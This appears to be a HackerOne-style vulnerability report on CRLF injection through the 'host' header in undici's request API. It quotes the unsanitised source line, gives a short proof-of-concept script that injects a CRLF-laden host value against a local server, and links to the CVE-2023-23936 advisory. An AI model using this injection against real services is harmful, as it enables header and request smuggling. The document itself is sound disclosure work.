Summary:
undici library should be protects HTTP headers from CRLF injection vulnerabilities. However, CRLF injection exists in the ‘host’ header of undici.request api.
Description:
like https://hackerone.com/reports/1664019
Source code:
lib/core/request.js:296
function processHeader (request, key, val) {
if (val && (typeof val === 'object' && !Array.isArray(val))) {
throw new InvalidArgumentError(`invalid ${key} header`)
} else if (val === undefined) {
return
}
if (
request.host === null &&
key.length === 4 &&
key.toLowerCase() === 'host'
) {
// Consumed by Client
request.host = val // without headerCharRegex.exec(val)
} else if (
request.contentLength === null &&
...
Example:
import { request } from 'undici'
const unsanitizedContentTypeInput = '12 \r\n\r\naaa:aaa'
const {
statusCode,
headers,
trailers,
body
} = await request('http://127.0.0.1:23333', {
method: 'GET',
headers: {
'content-type': 'application/json',
'host': unsanitizedContentTypeInput
}
})
console.log('response received', statusCode)
console.log('headers', headers)
for await (const data of body) {
console.log('data', data)
}
console.log('trailers', trailers)
{F2182450}
I have submitted the report: https://hackerone.com/reports/1820955
Security Releases: https://nodejs.org/en/blog/vulnerability/february-2023-security-releases/#fetch-api-in-node-js-did-not-protect-against-crlf-injection-in-host-headers-medium-cve-2023-23936
Security Advisory: https://github.com/nodejs/undici/security/advisories/GHSA-5r9g-qh6m-jxff
All versions of the 19.x, 18.x and 16.x release lines.